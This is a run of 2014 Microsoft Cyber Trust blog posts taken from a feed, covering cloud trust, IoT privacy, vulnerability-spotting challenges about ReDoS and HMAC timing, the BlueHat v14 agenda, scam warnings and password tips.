  • Privacy and data use: Because of the potential volume of personal or proprietary data that can be produced and stored by the IoT, both consumers and businesses will insist that the privacy of their information be protected. IoT products should take privacy-impacting collection and use of data into consideration from the earliest stages of design through development and deployment. IoT devices and services that seek to collect data pertaining to people should undergo appropriate scrutiny and evaluation for privacy concerns. Companies should also consider how they manage the commercial sharing of data as the IoT becomes a platform for trading information.
  • Appropriate level of cloud service capacity: Cloud services will need to be designed for a significantly higher number of simultaneous connections and greater volumes of data traffic given the expected proliferation of IoT devices. If cloud services are unable to manage the expected data flows generated by the IoT, they could be overwhelmed.

What should consumers do to protect their security and privacy related to IoT?

  • Evaluate security and privacy at purchase: Understand what security and privacy controls the device and services provide.
  • With updatable devices, keep software/firmware for your devices up-to-date: If the device offers automatic updates, consumers should enable them. Otherwise, consumers should check the manufacturer’s website regularly for new security updates.
  • Stay informed: Be aware and learn more about IoT devices and services.

You can learn more about Microsoft’s Internet of Things strategy here.

Trust me, I’m a cloud vendor, 14 Oct 2014 17:42:26 +0000 more »]]>I visited my sister and her family a while ago and somehow ended up playing a game with my seven year-old niece. I forget what it was called now, but the objective was to describe colors without being able to relate them to an object. In other words, describe the color blue without referring to the sea, or the sky.

Try it. It’s tough. Though apparently not for seven year-olds.

Don’t ask me how, because I really don’t know, but on the drive home the game got me thinking about the concept of trust and how it relates to the cloud and cloud services. Just how do you explain something as ethereal as trust and yet come across as genuine and well, trustworthy?

In today’s environment, winning and retaining their customers’ trust is every cloud provider’s ambition. But how do you earn the right to be trusted? What do you say? Somehow starting a conversation with the words ‘trust me’ seems to have the opposite effect.

Here’s another phrase: actions speak louder than words. And that is what we have tried to do at Microsoft – set out the things we do to make our cloud services more secure, private and reliable. With 200 online and cloud services serving a billion customers and 20 million businesses in more than 76 countries/regions we know that organizations won’t use technology they don’t trust.


Security and privacy have been ingrained into our culture for more than a decade. It’s part of our DNA. To help our customers decide whether they can trust our cloud we invite them to consider our efforts in four main categories: cybersecurity, data privacy, compliance and transparency.

There’s a lot to cover in each of these categories, but, as I learned playing the colour game with my niece, there’s a benefit in brevity. Over the next few weeks I’ll cover each of these in a bit more detail, starting with cybersecurity.


Cybersecurity is engineered into Microsoft products and services from the initial design stage using the Security Development Lifecycle (SDL) – a holistic and comprehensive software development process for writing more secure and privacy-enhanced code, and enabling more reliable products and services. We invented the SDL and today it is broadly regarded as the industry standard for writing more secure software. Many of its key elements have been adopted by organizations including the Government of India as well as commercial entities, including Itron, MidAmerican Energy, Adobe and Cisco as the basis for their secure development regimen. Our SDL was also recognized as a case study on how to do software security development in the ISO standard 27034-1.

To help protect against Internet-based security threats and continuously assess and enhance the security of our services, we utilize Operational Security Assurance (OSA). OSA combines the knowledge from our security development and security response programs, with the experience of running hundreds of thousands of servers in data centers around the world. This depth of experience helps make Microsoft cloud-based services’ infrastructure more resilient to attack by decreasing the amount of time needed to prevent, detect, and respond to real and potential Internet-based security threats, thereby increasing the security for our customers.

For many years, we have incorporated encryption into our products and services to help protect customers from online criminals and hackers. However, since June of 2013, public concern about the methods governments use to collect data has led many organizations to be concerned about the privacy of their information. We not only understand the concerns our customers have, we share them. While we have no direct evidence that customer data has been breached by unlawful and unauthorized government access, we are addressing this concern head on by pursuing a comprehensive engineering effort to strengthen the encryption of customer data across our networks and services.

Although this is a significant engineering effort given the large number of services we offer and the hundreds of millions of customers we serve, we are committed to moving quickly. Many services already benefit from strong encryption in all or part of the lifecycle. For example, is protected by best in class security such as Transport Layer Security (TLS) and Perfect Forward Secrecy (PFS) encryption for both outbound and inbound email. We are also expanding encryption across all our services to provide best in class encryption solutions for data in transit between a user and the service, data in transit between data centers, data at rest, and end-to-end communications between users. And for customers looking for another layer of protection, we have also invested in giving customers the ability to use their own encryption mechanisms to encrypt their data.

Please look in on the Cyber Trust Blog next week when I’ll talk further about what we are doing specifically in the area of data privacy.

Oh. You’re this color when you’re sad and yet when you look up on a sunny day it makes you happy. That’s how a seven year old girl explains blue.


Trust: what’s it all about?, 09 Oct 2014 18:52:15 +0000 more »]]>Today I delivered a keynote about trust in the cloud at the Cybersecurity Expo 2014 event in London. I’ve been thinking about how to tackle a topic like ‘trust’ and how it applies to cloud computing. I don’t know about you, but when someone you don’t know very well says ‘you can trust me,’ I kind of feel the opposite. I believe that actions speak louder than words.

With that in mind, I approached the topic by talking about four key areas that Microsoft believes are important for cloud service providers to demonstrate trustworthiness; areas that Microsoft delivers in the 200+ cloud services customers use today. As I did with the delegates today, I invite readers to consider cloud provider efforts in four main categories: cybersecurity, data privacy, compliance and transparency.

For Cybersecurity, Microsoft works to protect, detect and respond to threats against customers. We have invested in developing more secure products and services for more than a decade via the Security Development Lifecycle (SDL) – a holistic and comprehensive software development process that we created to help write more secure and privacy-enhanced code and enable more reliable products and services. Today the SDL is regarded as the industry standard for writing more secure software and is included as a case study in the ISO standard 27034-1.

Our online services adhere to a rigorous set of security and privacy controls that govern operations and support through a process called Operational Security Assurance (OSA). We have strong data encryption polices that help to protect our customers, partners and internal data within our networks. In support of this, in July we provided examples of how we are expanding encryption across our services to help protect customer data:

  • Office 365 – Provides message encryption, an email service that allows you to send encrypted mail to anyone.
  • Microsoft Azure – ExpressRoute, enables customers to access Azure services from their premises without having to traverse the Internet.
  • – Protection is provided by Transport Layer Security (TLS) encryption for both outbound and inbound email. has also enabled Perfect Forward Secrecy (PFS) encryption support for sending and receiving mail.
  • OneDrive has enabled Perfect Forward Secrecy (PFS) encryption.

Microsoft has a global, 24×7 incident response team that works to mitigate the effects of cyberattacks and malicious activity. The incident response team follows established procedures for incident management, communication, and recovery, and uses discoverable and predictable interfaces internally and to customers. We also proactively partner with law enforcement to combat cybercrime through our Digital Crimes Unit.

Our commitment to data privacy begins at the development stage and is part of the SDL as well as a set of internal guidelines, called the Microsoft Privacy Standard. As a result, our enterprise cloud services include world-class privacy features like Data Loss Prevention (DLP), Rights Management Services (RMS), and various controls that help customers manage risks to their data. As a result, we are currently the only cloud vendor whose commercial contracts meet the European Union Data Protection Authorities’ stringent standards for international transfers of data, a fact recognized by the “Article 29 Working Party”.

Third-party certifications help demonstrate compliance readiness to customers, auditors and regulators. Independent third-party companies, such as Deloitte and the British Standards Institution (BSI), regularly assess and verify our capabilities and adherence to a comprehensive set of requirements. Our structured approach to compliance is built on commitment to comply with a broad range of certifications, in many cases setting the pace for others to follow.

In March 2013, as part of our commitment to increased transparency, we began publishing details on the number of demands we receive each year in our Law Enforcement Requests Report and providing clear documentation of our established practices in responding to government legal demands for customer data.

It is important to recognize that the threat landscape will continue to evolve to keep pace with advances in security and data protection – that’s a given. Microsoft remains committed to protecting customer data through innovation and collaboration to help manage risk from cybercriminals.

For more information on our cloud services, check out

Vuln Hunt: Find the Security Vulnerability Challenge #2, 09 Oct 2014 16:27:43 +0000 more »]]>Ex-Netscape engineer Jamie Zawinski has a great quote about regular expressions. He said: “Some people, when confronted with a problem, think ‘I know, I’ll use regular expressions.’ Now they have two problems.” That’s certainly true for this week’s Security Vuln Hunt. Two points are possible, plus an extra bonus point.  The question:


The programmer here has written an input validation regex to test whether a given string matches the format of a URL, and while we should give him credit for designing his application to validate input, the particular regex pattern that he’s using is vulnerable to a denial of service attack.

The subexpression (\.[a-zA-Z0-9\-\._]+){2,} in the pattern contains a grouping expression with repetition (\.[a-zA-Z0-9\-\._]+) that is itself repeated via the expression {2,}. The worst-case operation time for such a regex construction is exponential time O(2n), and this could allow an attacker to craft a relatively short input value that would hang the application in an exponential processing loop.

Give yourself a point if you found the regular expression denial-of-service (ReDoS) vulnerability in the code.

Give yourself a point if you used the SDL Regex Fuzzer ( to find the vulnerability. These types of vulnerabilities are extremely difficult to find through manual code inspection, so why not take advantage of free tools that are available to help you?

Finally, give yourself a bonus point if you realized that in .NET 4.5, you can limit the amount of time that Regex spends trying to find matches by setting a matchTimeout value in the Regex constructor. This is an excellent defense-in-depth measure against ReDoS attacks.

Next week, we’ll look a sneaky SQL Injection vulnerability.

BlueHat v14 is almost here, 06 Oct 2014 18:01:00 +0000’s that time of year and BlueHat v14 is almost upon us. As always, BlueHat is an opportunity for us to bring the brightest minds in security together, both internal and external, to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

BlueHat kicks off on October 9th where we will spend the day focusing on researcher methodologies such as fuzzing, red team assessments, malware analysis and BIOS attacks. On the second day, we will have three tracks starting with Security & Identity, followed by State of the Hack (focusing on next generation of advanced persistent threats and web exploit detection) and then finally, we will end with Security in Deployed Environments.

We are very excited about interaction between Microsoft engineers and other top security experts who are coming to speak at the event. Here is a list of their talks:

*Please note that this schedule is subject to change.

October 9th, 2014





9:00 AM

9:40 AM

Chris Betz


9:40 AM

10:20 AM

Stefano Zanero

Botintime – Phoenix: DGA-based Botnet Tracking and Intelligence
Its common knowledge that a malicious domain automatically generated will not become popular and also an attacker will register a domain with a Top Level Domain that does not require clearance. Hence, we use phoenix which filters out domains likely to be generated by humans. The core of Phoenix is its ability to separate DGA from non-DGA domains, using linguistic features.

10:20 AM 10:35 AM Break

10:35 AM

11:15 AM

Scott Longheyer

Government Snooping Potentially Now Constitutes an Advance Persistent Threat
Security is the application of Privacy’s intentions, so open the pocketbook and check your ciphers. Gain a deeper understanding of Microsoft’s position on privacy and how online services intend to protect customer data.

11:15 AM

11:55 AM

Stefano Zanero

Jackdaw talk – Automatic Malware Behavior Extraction and Tagging
This talk will focus on our approach for extracting (interesting) behavior specifications in an automatic way from a large collection of (untagged) malware. If you wonder why? It’s because we believe in giving support to the analyst by providing a list of important behaviors, with a rough explanation, to prioritize the analysis.

11:55 AM

12:55 PM


12:55 PM

1:15 PM

Xeno Kovah

UEFI – What would it take to enable global firmware vulnerability & integrity checking?
This talk will describe what actions are being taken to improve security for PC firmware, and what different groups in Microsoft can do to help.

1:15 PM

1:35 PM

Yuriy Bulygin

UEFI – Summary of Attacks against BIOS and Secure Boot
A variety of attacks targeting platform firmware have been discussed publicly, drawing attention to the pre-boot and firmware components of the platform such as BIOS and SMM, UEFI secure boot and Full Disk Encryption solutions. This talk will detail and organize some of the attacks and how they work. We will cover attacks against BIOS write protection, attacks leveraging hardware configuration against SMM memory protections, attacks using vulnerabilities in SMI handlers, attacks against BIOS update implementations, attacks bypassing secure boot, and various other issues. We will describe underlying vulnerabilities and how to assess systems for these issues. After watching, you should understand how these attacks work, how they are mitigated, and how to verify if your system has any of these problems.

1:35 PM

2:15 PM

Josh Thomas

Behind the NDA: How to attack a product under deadline
This talk will focus on a brief security assessment of the Windows Phone / Nokia Lumia platforms with the intent of exploring attack methodologies. This talk will focus on how we as consultants approach a new problem / technology and how we can quickly become productive on new and previously unknown / unexplored hardware and software components.

2:15 PM

2:35 PM

Sergey Bratus, Julian Bangert

Defining and Enforcing Intent Semantics at ABI level
Dominant OS security policy designs treat a process as an opaque entity that has a "bag" of permissions to access some OS resources at any time, in any order. Now that the sensitive data that we most want to protect may never touch the filesystem or even cross a process boundary, these designs fail at their purpose. We introduce a design that has a much higher granularity of protection, yet is compatible with existing ABI, standard build chains, and binary utilities.

2:35 PM

2:50 PM


2:50 PM

3:30 PM

Andrew Ruef

Build It Break It Competition
We created a competition where students design and implement secure programs, and identify bugs in each other’s programs. We’ll talk about the design of the competition, the data we’ve gathered from executing the competition, our plans for future competitions, and what the data is telling us about software security, programming languages, education, and software development.

3:30 PM

4:10 PM

Ram Shankar Siva Kumar, John Walton

Subverting machine learning detections for fun and profit
If you are using Machine learning in your feature, it can be attacked! This talk is a primer on Adversarial Machine learning wherein we show how attackers can manipulate machine learning systems to get the result they want you to see. You will learn how to protect yourself and detect such attacks. You don’t need to know about Machine learning to attend this talk – we’ve got you covered.

4:10 PM

4:40 PM

Lightning Talks


October 10th, 2014

9:00 AM

10:00 AM

Lightning Talks & Breakfast

10:00 AM

10:40 AM

Benjamin Delpy, Chris Campbell,
Skip Duckwall

The Attacker's View of Windows Authentication and Post Exploitation part 1
This talk will focus on the how Windows authentication works in the real world and what are the popular attacks against it. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps – How do you design services that are breach-resistant and make authentication harder to crack.

10:40 AM

11:20 AM

Benjamin Delpy, Chris Campbell,
Skip Duckwall

The Attacker's View of Windows Authentication and Post Exploitation part 2

11:20 AM

11:35 AM


11:35 AM

12:15 PM

Ho John Lee

Privacy and Security in a Personalized Services World
An introduction and discussion of current policy issues around personalized mobile and cloud-based knowledge services. In this talk you will learn about some of the privacy and policy issues associated with large scale, cloud based personalization that are different from those in web search, email, or social networks. I will also present some concepts and patterns for building mobile and personalized services that honor individual user data obligations while also enabling offline data analysis and global, low latency serving infrastructure.

12:15 PM

12:55 PM

Bo Qu

The failure and success in IE fuzzing
The road to success is often paved with failure. In this presentation we will discuss the mistakes and challenges we overcame while developing our fuzzer that has successfully discovered over 100 vulnerabilities in Internet Explorer.
Welcome to the school of hard knocks!

12:55 PM

1:55 PM


1:55 PM

2:35 PM

John Walton

Next Generation Advanced Persistent Threat™
What will tomorrow’s threat landscape, look like?  How can attacks become even more advanced than we are observing today? What will the adversary’s arsenal contain?  The Next Generation Advanced Persistent Threat™ talk will peer into the future and these exact questions.  Come discover how we will continue to be outmaneuvered during every phase of the cyber kill chain

2:35 PM

2:55 PM

David Finn

Fighting Cybercrime with Big Data
The Microsoft Digital Crimes Unit (“DCU”) is a team of about 100 people, including former prosecutors, law enforcement officials, security analysts, investigators, attorneys, and intelligence analysts, dedicated to the fight against global cybercrime. In this presentation about DCU’s CSI-like blend of crime fighting and technology, find out how Big Data and analytics is revolutionizing everything DCU does – helping protect internet users, and disrupting and dismantling criminal organizations all over the world.   

2:55 PM

3:10 PM


3:10 PM

3:30 PM

Alexandra Savelieva, Daniel Eshner,
Nuwan Ginige, Mohammad Usman

Data Isolation In Multitenant Cloud Environment
In our talk, you’ll learn about a new solution that we built to address the problem of managing access to data across various fabrics and processing environments to mitigate top security threats of a cloud-based distributed application platform shared by multiple partners, including isolation of mutually distrustful tenant applications running side-by-side on a commodity server.

3:30 PM

4:30 PM

Daniel Edwards

Engineer's guide to DDOS
Are you ready to discuss DDoS?  Can your online service be weaponized to attack?  It’s already happened to others.  Is yours next?

Vuln Hunt: Find the Security Vulnerability Challenge #1, 02 Oct 2014 16:19:18 +0000 more »]]>Whether it’s a riddle, puzzle, or detective mystery novel, most of us like to solve a good brain teaser. As security and program experts, these types of conundrums keep us on our toes. During the next few weeks, I’ll share some of my favorites, and see if you can find the security vulnerability. For this first one, let’s take a look at authenticated encryption. Two points are possible for solving this stumper, plus an extra bonus point.  Question:


First off, let’s give one point to the programmer, who realized that many encryption algorithms do not in themselves provide any integrity protection.

Encryption prevents an eavesdropper “Eve” from reading the message that Alice sends to Bob, but contrary to popular belief, it does not prevent Eve from intercepting and tampering with that message. (There are notable exceptions such as Galois/Counter Mode (GCM) and Counter with CBC-MAC (CCM) encryption modes, but for the purposes of this question we will assume that a non-authenticated encryption mode such as Cipher-block Chaining (CBC) was used.)

We also give a point to the programmer for using an encrypt-then-MAC design.

Alternative approaches (MAC-then-encrypt and encrypt-and-MAC) are extremely dangerous and have led to several serious security vulnerabilities: read Moxie Marlinspike’s blog post on the “Cryptographic Doom Principle” if you’d like to delve deeper. Give yourself a point if you realized that an encrypt-then-MAC approach is not a security bug.

However, although the programmer correctly validates the HMAC before decrypting, he does so a byte at a time and returns false as soon as he gets a mismatched byte. This means that a tampered HMAC value will fail slightly faster if the first byte is wrong than if the first byte is right. A persistent attacker may be able to exploit this timing difference to craft a valid HMAC for a tampered message. Give yourself a point if you found this timing attack vulnerability in the for-loop.

Finally, although it’s not a security “bug” per se, give yourself a bonus point if you noted that this code uses hardcoded cryptographic algorithms and is therefore not cryptographically agile.

All crypto weakens over time, and while HMAC-SHA256 is considered a strong algorithm now, that may change in the future (and perhaps suddenly). You should plan for this eventuality now and avoid hardcoding cryptographic algorithms into your code: see “Cryptographic Agility” for more details.

While finding a solution can be entertaining, it can also be serious business when it comes to security. For us, the goal is to provide even greater protection for data across all the great Microsoft services you use and depend on every day.

Next week, we’ll take a look at regular expressions.

Vuln Hunt: Find the Security Vulnerability Challenge, 25 Sep 2014 18:15:54 +0000 more »]]>There’s a saying that many people have heard, “If it was snake, it would have bitten you.” More often than not, that’s the case with software vulnerabilities. A security class bug can often be so subtle in a program that human reviews, static code analysis and other sophisticated tools might not find it. Yet at the same time, finding that vulnerability can be critical, especially if it is exploitable.

During the next several weeks, in our ‘Vuln Hunt: Find the Security Vulnerability Challenge,’ we’ll share a few light-hearted examples from our Microsoft security experts that illustrate how subtle security vulnerabilities can be. Some of the examples they will share, can make even the savviest of us take a second look. Let’s see how well you do in with our first challenge that takes a look at authenticated encryption.

If you haven’t already, I also encourage you to check out another great security story “Life in Digital Crosshairs; the dawn of the Microsoft Security Development Lifecycle.” This story is about the industry-leading Security Development Lifecycle (SDL) which has been helping public and private organizations for the past 10 years, change their engineering cultures and develop more secure software, and help find where the vulnerabilities may be.

Enjoy the challenge!

Bug Bounty Evolution: Online Services, 23 Sep 2014 10:31:57 +0000 marks the next evolution in bounty programs at Microsoft as we launch the Microsoft Online Services Bug Bounty program starting with Office 365. In our mobile first, cloud first world, this is an exciting and logical evolution to our existing bug bounty programs.

Office 365 is the first of our online services groups to launch a bounty for vulnerabilities found in their services and we will bring others into the program as we go forward. For a list of eligible services and program terms, please visit Of course, any vulnerabilities discovered in any Microsoft products or services can and should be reported according to our Coordinated Vulnerability Disclosure guidelines to us by emailing

We invite you to also read the Office 365 blog post here where our colleagues there discuss some of what they are hoping to see as a result of this program. Our goal with bounty programs is ultimately unchanged and that is to uncover issues and protect customers as quickly as possible and as always, partnering with the security research community offers us the broadest way to do that.

Happy Hunting!

Akila Srinivasan

HOW TO: Report the Microsoft phone scam, 18 Sep 2014 08:57:00 +0000 more »]]>If someone calls you from Microsoft technical support and offers to help you fix your computer, mobile phone, or tablet, this is a scam designed to install malicious software on your computer, steal your personal information, or both.

Do not trust unsolicited calls. Do not provide any personal information.

You can report this scam to the following authorities:

Whenever you receive a phone call or see a pop-up window on your PC and feel uncertain whether it is from someone at Microsoft, don’t take the risk. Reach out directly to one of our technical support experts dedicated to helping you at the Microsoft Answer Desk. Or you can simply call us at 1-800-426-9400 or one of our customer service phone numbers for people located around the world.

What to do if your antivirus subscription has expired, 16 Sep 2014 09:00:00 +0000 more »]]>Phil asks:

I’m new to Windows 8.1. Now that my free security software has expired, how do I go about making Windows Defender my choice security method?

Windows Defender is included with Windows 8 and Windows 8.1 and helps protect your PC against malware (malicious software). Many new computers come with free subscriptions to antivirus software and other security programs from companies other than Microsoft. If the subscription runs out and you don’t want to pay for it, you need to:

  1. Fully uninstall the non-Microsoft security software that came with your computer.
  2. Make sure Windows Defender is turned on.

To uninstall the security software that came with your computer, check the software’s Help file.

Make sure Windows Defender is turned on in Windows 8

  1. Swipe in from the right edge of the screen and tap Search (or if you’re using a mouse, point to the upper-right corner of the screen, move the mouse pointer down, and then click Search).
  2. In the Search box, type Windows Defender.
  3. Tap or click the Windows Defender icon.
  4. Go to Settings, and make sure that Turn on real-time protection (recommended) is selected.
  5. Tap or click Save Changes.
How do digital youth of the "app generation" learn, communicate, and express themselves, 11 Sep 2014 08:58:00 +0000 more »]]>I recently had the opportunity to speak with Katie Davis, an assistant professor from the University of Washington Information School to discuss her role and a book she co-authored called, The App Generation: How Today’s Youth Navigate Identity, Intimacy, and Imagination in a Digital World.

The University of Washington is the first to have an Information or iSchool focused on youth and technology. Tell us about the school and your students’ focus of study.

Our digital youth faculty teaches a range of courses and provides research experiences for undergraduate, masters, and PhD students. We aim to prepare world-class digital youth researchers, practitioners who work directly with young people, and innovators who design and create digital tools and services for youth. One of the courses I teach, called Youth Development and Information Behavior in a Digital Age, explores new research on the impact of digital media tools and practices on youth development, including academic development.

How did you become interested in writing about kids’ use of technology and, in particular, apps?

My interest began over 10 years ago, when I was a fourth grade teacher. At that time, technology was becoming increasingly central to young people’s lives, both inside and outside of school. As a teacher, it was clear to me that this trend was only going to get bigger. I started to think about the many implications involved with respect to how young people learn, communicate with other people, and express themselves.

I was fortunate that when I came to Harvard as a doctoral student, my advisor and now co-author, Howard Gardner, was starting to ask similar questions. During the course of our research, we came to an important realization: whereas earlier generations have typically been defined by political or economic events (think of the World Wars, the Great Depression, and the Civil Rights Movement), this generation of young people is defined—and, importantly, defines itself—more by the technologies they use. Apps weren’t part of the cultural zeitgeist when we started our research, but as the iPhone was introduced in 2007 and the slogan “there’s an app for that” became a common saying, we realized that apps served as a fitting metaphor for what we were observing in our research. In our book The App Generation, we alternate between referring to apps metaphorically, to illuminate particular themes in our findings, and literally, to explore how teens use various apps like Snapchat, Instagram, Facebook, and Twitter.

What are the benefits of our app-driven lifestyle, and what might be some of the drawbacks?

In the book, we introduce the idea of an app mentality that many of today’s youth seem to exhibit. The app mentality suggests that whatever human beings might desire should be provided by apps. If the app doesn’t exist, it should be devised by someone right away. If no app can be imagined or created, then maybe the desire simply doesn’t or shouldn’t matter.

We see both positive and negative variations on the app mentality. A world permeated by apps is in many ways a terrific one. Apps are great if they take care of ordinary things and free us up to explore new paths and form deeper relationships. They are great also as they increasingly become tools for productive work, offer us ways to stay connected to our friends and family, and even provide us with avenues for new experiences. When apps are used in this way, they are app-enabling.

But there’s a less optimistic view of apps. There’s a danger that we become overly dependent on apps for the answers, for social connection, for our sense of ourselves. There’s a danger that we look to apps before we look inside ourselves. If this happens—if we start to see more of our apps than ourselves in our experiences, actions, self-expressions—it’s our argument that we have become app-dependent.

How can technology foster and enhance our creativity?  By the same token, does your research indicate that technology can dampen our artistic abilities? 

Digital media can open up new avenues for youth to express themselves creatively. Yet, it’s important to consider the fact that app developers constrain artistic expressions in specific ways. For instance, if you’re using a painting app, your color palette is limited to the hues that the designer programmed into the app. In a music composition app, your tonal range is similarly limited. Of course, sophisticated users can create their own workarounds and break free from the constraints of the underlying code. But realistically, most people will work within the parameters of the original app, and that raises important questions about how such boundaries affect the creative process.

We explored changes in youth creativity over a 20-year time span, analyzing over 350 pieces of visual art produced by high school students and nearly 100 fiction stories written by middle and high school students between 1990 and 2011. Though we were expecting to find that creativity in the visual and literary domains would either rise or fall together, our analysis uncovered a surprisingly divergent pattern. We found that certain dimensions of creativity, such as originality, experimentation, and complexity, have diminished in the literary domain while they’ve increased in the visual domain.

The literary pieces written in recent years tended to be more mundane—there was less experimentation with genre, character types, and setting. Whereas a story from the early 1990s might involve a character who metamorphosed into a butterfly, there was very little such deviation from reality in the more recent pieces. In contrast, the pattern we detected in the visual art was one of increasing experimentation and sophistication. Contemporary artists were more likely to draw on the expansive selection of media at their disposal to create layered works that hold the eye longer with their increased complexity and unexpected composition.

We’ve considered these findings in terms of the role of digital media, though we can only offer our best hypotheses rather than draw a direct connection between technology and changes in youth’s artistic productions. With respect to the visual art findings, we note that digital media provide a wider, easier, and cheaper array of tools for youth to express themselves creatively. In addition, the Internet has expanded access to sources of inspiration as well as opportunities to receive feedback and recognition for one’s artistic productions.

With respect to writing, it’s hard to tell if kids are writing less, but the type of writing they do online is often quick, fleeting, and very much tied to the everyday and mundane. These characteristics mirror the patterns we saw in our analysis of youth’s creative writing. It’s also worth noting, for writing at least, the likely influence of our education system’s increasing focus on standardized testing over the last 20 years. Such a focus rewards writing the perfect five-paragraph essay rather than taking risks in one’s writing.

What surprised you when you started researching and writing your book?

My biggest surprise has been hearing teens express real ambivalence toward digital media and its role in their lives. When I talk with teens, I typically ask them to imagine what it would be like to go through a day (then a week, a month, and longer) without their phones, apps, or social media. The initial reaction is fairly standard: what an unpleasant, hard-to-imagine scenario! They’d be disconnected from their networks of friends and followers on Instagram, Facebook, and Twitter; they’d be unable to conduct research for school; and they’d be deprived of the many sources of entertainment they enjoy online and through apps. After going through the list of what they wouldn’t have or be able to do, many teens start to consider what they might gain: uninterrupted, lengthier face-to-face conversations; more time for personal reflection; fewer distractions when doing homework.

This ambivalence toward technology tells me that youth recognize many of the same opportunities and challenges around their digital media use as adults. I think this recognition is a great entry point for family members, teachers, and others who work with and support youth to engage them in conversations about the positive and negative aspects of technology, and through these conversations help one another to use digital media in an app-enabled way.

What can parents, teachers, coaches, and others do to help raise responsible, tech-savvy consumers?

A good place to start is with our own technology use. We should remember that adults are powerful models for youth. They see us tied to our laptops, smartphones, and tablets, and they’re taking note! We have the opportunity to model moderation in technology use, show kids there’s a time to put these devices away and be fully present.

Adults can also provide app-enabled experiences that emphasize open-ended exploration and personal initiative over more structured, top-down, and constrained activities. We’ve sampled a variety of apps—many of them with an educational bent—during the course of researching and writing The App Generation. Apps like Minecraft, Scratch, and Digicubes seem (unfortunately) to be among the minority that encourage open-ended exploration and creation. Others we’ve sampled are packed with a lot of bells and whistles that have little relation to the purported learning objectives and leave little room for users to exercise their own creativity and initiative.

Finally, we think computational skills should be emphasized to a greater degree in K–12 education so that kids are able to modify apps as they wish, even create their own. This is something that the UW iSchool does very well in its Informatics and Master of Science in Information Management programs. The ability to understand how apps and other technologies work constitutes a new—and critical—literacy for this new digital era.

Should industry be thinking how to design responsible products, services and apps that foster being a good digital citizen?

Yes, I think designers have a responsibility to consider how their apps are likely to be used, for good and bad. Of course, it’s impossible to anticipate all the different ways one’s creation might be used or modified.

My iSchool colleague, Professor Batya Friedman, has pioneered an approach to designing technologies and tools that take into account what humans care about. Called value-sensitive design, this approach seeks to account for the values of both direct and indirect stakeholders in a principled and systematic manner throughout the design process. A value-sensitive design approach encompasses more than digital citizenship. Designers could use such an approach to think about app-enablement vs. app-dependence during the design process, and attempt to design so that users are encouraged to use apps in an open-ended way, as non-constrained as possible.

Get security updates for September 2014, 09 Sep 2014 10:09:00 +0000 more »]]>

Microsoft releases security updates on the second Tuesday of every month.

How to check for the latest updates.

This bulletin announces the release of security updates for Windows, Microsoft Office, and other programs.

To get more information about security updates and other privacy and security issues delivered to your email inbox, sign up for our newsletter.





Get advance notice about September 2014 security updates, 04 Sep 2014 10:09:00 +0000 more »]]>Today, the Microsoft Security Response Center (MSRC) posted details about the September security updates.

If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you’ll see an alert in the notification area at the far right of the taskbar—be sure to click it.

In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. To check this setting and turn on automatic updating, open the Search charm, enter Turn automatic updating on or off, and tap or click Settings to find it.

Learn how to install Windows Updates in Windows 7.

If you are a technical professional

The Microsoft Security Bulletin Advance Notification Service offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.

Sign up for security notifications

Congratulations! You’ve won $800,000!!, 02 Sep 2014 09:38:00 +0000http://marcbook.local/wds/playground/cybertrust/2014/09/02/congratulations-youve-won-800000/Read more »]]>Well, maybe not.

But that’s just one of the many ploys that scammers send in their relentless efforts to part people from their money or sensitive personal information like passwords and account numbers.

Microsoft is asking people to take a survey of their experience with online fraud—what kinds of scams they’ve encountered (including those on mobile devices and Facebook), how concerned they are about online or phone fraud, and what steps they take to protect themselves.

In 2012, Microsoft fielded its first such study, interviewing 1,000 US residents to understand their exposure to, and perception of, online fraud and scams.

Respondents reported having encountered roughly eight different scams on average, with these as the top four:

  • Scams that promise free things or coupons (44 percent)
  • Fake antivirus alerts that imitate real programs offering virus repair but that download malware instead (40 percent)
  • Phishing scams using fake messages that mimic those of trusted businesses to trick people into revealing personal information (39 percent)
  • Fraud that features a request for bank information or money upfront from someone (such as a “foreign prince”) who needs help transferring large sums of money for a cut of the total (39 percent)

In the new survey, we’re interested in how scams and responses to scams might have changed since 2012. Are there different scams? What are the most common? Where are they most often occurring—on mobile devices? On Facebook?

Results of our last survey showed that nearly everyone (97 percent) took steps to safeguard their computers, but more than half (52 percent) did nothing at all to protect their mobile devices. So we’re particularly interested to see if these numbers have changed.

You can help us fight online scams and fraud by taking our survey.

We will release the results of the survey during National Cyber Security Awareness Month this October. Follow the hashtag #NCSAM to read the story.

5 passwords you should never use, 29 Aug 2014 09:11:00 +0000http://marcbook.local/wds/playground/cybertrust/2014/08/29/5-passwords-you-should-never-use/Read more »]]>This is part three of three posts on stronger passwords.

Part 1: Create stronger passwords and protect them

Part 2: Do you know your kids’ passwords?

The news is filled with stories about hackers cracking passwords. You can help avoid being a victim by never, ever using these passwords:

  1. Password. Believe it or not, this is still a common password. Don’t use it.
  2. Letmein. We recommend that you use passphrases that are memorable. Just don’t use this one. It ranks high on several lists of the most-used passwords.
  3. Monkey. This common word appears on many lists of popular passwords. It’s also too short. Make passwords at least eight characters—the longer the better.
  4. Your pet’s name. While you’re at it, don’t use any passwords that can be easily guessed, such as the name of your spouse or partner, your nickname, birth date, address, or driver’s license number.
  5. 12345678. Avoid this and other sequences or repeated characters such as 222222, abcdefg, or adjacent letters on your keyboard (such as qwerty).

Bonus password tips

Don’t use the same password for multiple sites. Cybercriminals can steal passwords from websites that have poor security and then use those same passwords to target more secure environments, such as banking websites.

Change your passwords regularly, particularly those that safeguard your computer, important accounts (like email or Facebook), and sensitive information, like financial and health data.

For more password guidance, see Create strong passwords.


SAFECode on Confidence: One Size Does Not Fit All, 23 May 2014 15:00:00 +0000http://marcbook.local/wds/playground/cybertrust/2014/05/23/safecode-on-confidence-one-size-does-not-fit-all/Read more »]]>In a recent post by SAFECode, a non-profit organization of software vendors dedicated to increasing trust in information and communications technology products by improving security and assurance methods, Eric Baize of EMC and Steve Lipner of Microsoft discuss the challenging subject of trustworthiness of acquired software.  How a customer gains confidence in acquired software is a frequently asked question of developers.  The latest SAFECode blog discusses three approaches that a customer can use to assess the security of acquired software with varying levels of confidence.

